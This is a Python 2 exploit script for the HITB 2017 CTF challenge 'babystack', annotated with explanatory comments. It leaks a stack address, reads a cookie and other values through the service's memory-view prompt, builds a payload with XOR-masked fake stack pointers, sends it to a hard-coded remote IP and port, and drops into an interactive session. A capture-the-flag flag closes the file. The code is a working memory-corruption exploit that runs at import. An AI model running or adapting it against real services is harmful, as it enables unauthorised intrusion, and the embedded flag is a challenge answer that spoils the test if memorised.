babystack-hitb2017.py
from customlibpwn import *
def p(m):
    """Pack *m* as a 4-byte little-endian unsigned integer.

    ``pack`` arrives through the ``customlibpwn`` star import and is assumed
    to be ``struct.pack``, so values outside the 32-bit unsigned range are
    rejected by it rather than truncated here.
    """
    little_endian_u32 = "<I"
    return pack(little_endian_u32, m)
def u(m):
    """Decode the 4-byte little-endian unsigned integer held in *m*.

    Mirror image of ``p``: ``unpack`` (from the ``customlibpwn`` star
    import, assumed to be ``struct.unpack``) yields a one-tuple and the
    single field is returned as an int.
    """
    (value,) = unpack("<I", m)
    return value
########################################################
# PWN! PWN! PWN!
########################################################
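def _extract_hex(data):
    """Return the hex number that follows ``"is "`` in a service reply.

    Raises ValueError when the marker is absent; the original ``find() + 3``
    would silently slice from offset 2 on a miss.  The number is cut at the
    first CR or LF rather than only at the exact ``"\\r\\n"`` pair, so a reply
    with a bare ``"\\n"`` line ending no longer loses its last digit
    (``find`` returning -1 used to become ``data[0:-1]``).
    """
    start = data.find("is ")
    if start < 0:
        raise ValueError("reply has no 'is ' marker: %r" % (data,))
    rest = data[start + 3:]
    end = len(rest)
    # Stop at whichever line terminator comes first; Python 2 compatible
    # (no min(..., default=)).
    for sep in ("\r", "\n"):
        pos = rest.find(sep)
        if 0 <= pos < end:
            end = pos
    return int(rest[:end], 16)


def view_value(addr):
    """Ask the remote service for the value at *addr* and return it as an int.

    Drives one round of the service's "Do you want to know more?" /
    "Where do you want to know" dialogue over the connection opened by
    ``sock()``; ``send`` and ``recvu`` come from ``customlibpwn``.  The reply
    is expected to contain ``"... is <hex>"`` followed by a line break.

    Raises ValueError if the reply does not contain the ``"is "`` marker or
    the text after it is not a hex number.
    """
    send("yes\n")
    recvu("Where do you want to know")
    send(str(addr) + "\n")
    data = recvu("Do you want to know more?")
    return _extract_hex(data)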
def doexploit():
    """Run the babystack (HITB 2017) exploit end to end against the remote service.

    Python 2 script: it relies on the ``print`` statement, ``raw_input`` and
    integer ``/``.  ``sock``/``send``/``recvu``/``telnet``/``p32`` all come
    from ``customlibpwn``.  Every offset and the hard-coded ``base`` are
    specific to the challenge binary and service the author targeted.
    """
    #sock("192.168.177.1",4000,64)
    # Hard-coded remote target; the commented line above is presumably the
    # local test host.  The meaning of the third argument is not visible here.
    sock("47.74.133.139",20004,64)
    # The banner contains a hex number which the author names ``stack``
    # (apparently a leaked stack address): take from "0x" up to the first CRLF.
    data=recvu("Do you want to know more?",1)
    i=data.find("0x")
    data= data[i:]
    j = data.find("\r\n")
    data=data[0:j]
    stack= int(data,16)
    print hex(stack)
    #base = 0x161000
    # ``base`` is not derived from a leak; it is hard-coded, and the commented
    # value is the one used on another run.  Presumably the binary's load base.
    base=0xd91000
    # Chain of reads through the service's "view" primitive: each result is
    # used as the next address.  v1 and v2 are only stepping stones; the final
    # v3 is embedded in the payload below.
    v1= view_value(stack+0x8c)
    v2=view_value(v1)
    v3=view_value(v2)
    v3=view_value(v3+4)
    # Value the author labels ``cookie``, read from a fixed offset off ``base``.
    cookie = view_value(base+0x3004)
    print hex(cookie)
    # Presumably a "no" answer to the prompt, so the service moves on to the
    # next input.
    send("noo\n")
    # Two stack-relative addresses XOR-masked with ``cookie``; both are placed
    # in the payload below.
    fake=cookie^(stack+4)
    fake2=cookie^(stack-0x44)
    payload=p32(0xFFFFFFE4)+p32(0)+p32( 0xFFFFFF20)+p32(0)+p32(0xFFFFFF20)+p32(base+0x0348)+p32(base+0x038D)+p32(0)*2
    payload+=p32(0xcc)
    # Pad the payload up to 0x8c bytes with copies of ``stack``.
    # NOTE: Python 2 integer division -- under Python 3 this would be
    # ``float * str`` and raise TypeError.
    payload+= ((0x8c-len(payload))/4)*p32(stack)
    payload+=p32(stack+0x8c+0x14)+p32(base+0x460)+p32(fake)+p32(0x0)+p32(fake2)
    payload+= p32(0xffffffff)
    payload+= p32(v3)
    payload+="\n"
    send(payload,1)
    recvu("Do you want to know more?")
    send("yes\n")
    recvu("Where do you want to know")
    # Blocks for operator input before the final send -- a manual pause,
    # presumably used while debugging.
    raw_input()
    send("123\n")
    # Hands the connection over to the interactive helper from customlibpwn.
    telnet()
# Runs at import time as well as when executed directly: there is no
# ``if __name__ == "__main__":`` guard.
doexploit()
#hitb{W0W_y0u_kn0w_sc0p3_t4b13}